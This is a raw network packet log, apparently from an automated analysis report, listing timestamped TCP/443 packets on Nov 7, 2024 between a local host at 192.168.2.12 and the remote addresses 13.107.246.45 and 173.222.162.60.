                                                                                                              Nov 7, 2024 12:49:00.441056013 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.441513062 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.441560984 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.441977024 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.444005966 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.444835901 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.444863081 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.445498943 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.449834108 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.450366974 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.554971933 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.557914972 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.583039999 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.583056927 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.583148956 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.583602905 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.583615065 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.583671093 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.583822012 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.584261894 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.584311008 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.586275101 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.586333036 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.587110996 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.587204933 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.591118097 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.591969967 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.739917994 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:00.742517948 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:00.956569910 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.104772091 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.104788065 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.104804039 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.104818106 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.104829073 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.104839087 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.104876041 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.104938984 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.104949951 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.104954958 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.104971886 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.104983091 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.105375051 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.391446114 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.396471977 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.397041082 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.401881933 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.404758930 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.407006025 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.407824993 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.409612894 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.411871910 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.412609100 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.520762920 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.528995037 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.529076099 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.533402920 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.536391020 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.536467075 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.543173075 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.544542074 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.544894934 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.544996977 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.549484968 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.549631119 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.550900936 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.554390907 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.559865952 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.561407089 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.566329002 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.673520088 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.673985958 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.674057961 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.674271107 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.683171034 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.683244944 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.690143108 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.713449955 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.714348078 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.715409994 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.718965054 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.719973087 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.720160007 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.726694107 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.731949091 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.734471083 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.739289045 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.842909098 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.844400883 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.844458103 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.844973087 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.856976032 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.857017040 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.862684965 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.889461040 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.894356966 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.905141115 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.909996986 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.934777021 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.939785004 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.942763090 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.943353891 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:01.947757006 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:01.948160887 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.003530025 CET49673443192.168.2.12173.222.162.60
                                                                                                              Nov 7, 2024 12:49:02.005331993 CET49674443192.168.2.12173.222.162.60
                                                                                                              Nov 7, 2024 12:49:02.018335104 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.056487083 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.056626081 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.064876080 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.064883947 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.069538116 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.069739103 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.073115110 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.073187113 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.073669910 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.073726892 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.089876890 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.094757080 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.132731915 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.179930925 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.194181919 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.197952032 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.198080063 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.204152107 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.209022999 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.218625069 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.262840986 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.262980938 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.274090052 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.274661064 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.275501013 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.276213884 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.279448986 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.280997038 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.333101034 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.378474951 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.403781891 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.404671907 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.404774904 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.405145884 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.405165911 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.405224085 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.405679941 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.427953959 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.441020012 CET49672443192.168.2.12173.222.162.60
                                                                                                              Nov 7, 2024 12:49:02.466892004 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.467829943 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.467947960 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.471725941 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.473407030 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.528578997 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.559627056 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.581490040 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.595745087 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.596600056 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.596688032 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.597491026 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.599675894 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.601074934 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.601615906 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.606066942 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.647711992 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.657440901 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.660710096 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.666024923 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.710597038 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.713171005 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.718099117 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.728288889 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.730434895 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.730484009 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.730496883 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.730544090 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.730668068 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.732495070 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.732614994 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.737545967 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.779712915 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.790450096 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.793116093 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.798074007 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.841713905 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.844177961 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.849035978 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.859146118 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.861335039 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.861417055 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.861701965 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.863882065 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.866451025 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.866588116 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.871268988 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.915760994 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.922229052 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.926008940 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.930973053 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.973119974 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.976411104 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:02.981275082 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:02.999686003 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.000092030 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.000165939 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.000375986 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.001800060 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.002331018 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.002490997 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.007107973 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.051703930 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.055001974 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.058007956 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.062995911 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.105710030 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.108103991 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.113008976 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.130973101 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.131642103 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.131692886 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.132167101 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.134804010 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.134885073 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.135652065 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.140580893 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.189536095 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.192004919 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.236987114 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.240041971 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.264792919 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.265232086 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.265315056 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.265692949 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.267102957 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.267256021 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.268254042 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.272188902 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.315764904 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.320940018 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.323467016 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.328357935 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.370372057 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.372922897 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.377897978 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.396151066 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.396163940 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.396250963 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.396426916 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.396620989 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.396672964 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.398832083 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.398952961 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.399496078 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.403872967 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.451642990 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.452265024 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.454689980 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.690927982 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.865084887 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.865123987 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.865134954 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.865142107 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.865153074 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.865180969 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.865200043 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.865212917 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.865274906 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.865319014 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.867260933 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.867305994 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.867333889 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.867343903 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.867364883 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.867377996 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.867403030 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.867405891 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.867412090 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.867412090 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.868669987 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.868709087 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.869187117 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.869277000 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.873490095 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.873500109 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.873976946 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.873994112 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.989732027 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.992919922 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.997782946 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.997849941 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.997853994 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.997865915 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.997874975 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.997916937 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:03.998965025 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.999007940 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:03.999031067 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.000545979 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.001250982 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.001343012 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.001769066 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.006464005 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.051621914 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.121614933 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.124444008 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.129240036 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.130790949 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.131086111 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.131149054 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.131567001 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.131606102 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.131654024 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.132169008 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.133481979 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.134255886 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.134413958 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.134802103 CET49709443192.168.2.1213.107.246.45
                                                                                                              Nov 7, 2024 12:49:04.139132023 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.139611006 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.253289938 CET4434970913.107.246.45192.168.2.12
                                                                                                              Nov 7, 2024 12:49:04.256092072 CET49709443192.168.2.1213.107.246.45
